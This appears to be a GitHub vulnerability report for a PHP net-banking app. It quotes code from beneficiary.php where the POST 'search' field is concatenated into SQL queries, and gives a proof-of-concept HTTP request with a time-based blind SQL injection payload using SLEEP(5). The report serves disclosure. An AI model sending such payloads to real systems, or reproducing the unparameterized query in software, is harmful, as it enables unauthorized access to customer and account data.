You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
net-banking/beneficiary.php from line 74,The $_POST['search'] parameter is controllable, the parameter search can be passed through post, and the $search is not protected from sql injection, line 92 $result1 = $conn->query($sql1); made a sql query,resulting in sql injection
......
......
......
if (isset($_POST['submit'])) {
$back_button = TRUE;
$search = $_POST['search'];
$by = $_POST['by'];
if ($by == "name") {
$sql1 = "SELECT cust_id, first_name, last_name, account_no FROM customer WHERE cust_id=".$row["benef_cust_id"]." AND (first_name LIKE '%$search%' OR last_name LIKE '%$search%' OR CONCAT(first_name, ' ', last_name) LIKE '%$search%')";
}
else {
$sql1 = "SELECT cust_id, first_name, last_name, account_no FROM customer WHERE cust_id=".$row["benef_cust_id"]." AND account_no LIKE '$search'";
}
}
......
......
......
<?php$result1 = $conn->query($sql1);
......
......
......
POC
POST /net-banking/beneficiary.php HTTP/1.1Host: www.bank.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=m5fjmb3r9rvk4i56cqc22ht3c3Content-Length: 16submit=&search=' AND (SELECT 2893 FROM (SELECT(SLEEP(5)))EXvW)-- WklL
Attack results pictures
The text was updated successfully, but these errors were encountered:
Vulnerability file address
net-banking/beneficiary.php
from line 74,The$_POST['search']
parameter is controllable, the parameter search can be passed through post, and the$search
is not protected from sql injection, line 92$result1 = $conn->query($sql1);
made a sql query,resulting in sql injectionPOC
Attack results pictures
The text was updated successfully, but these errors were encountered: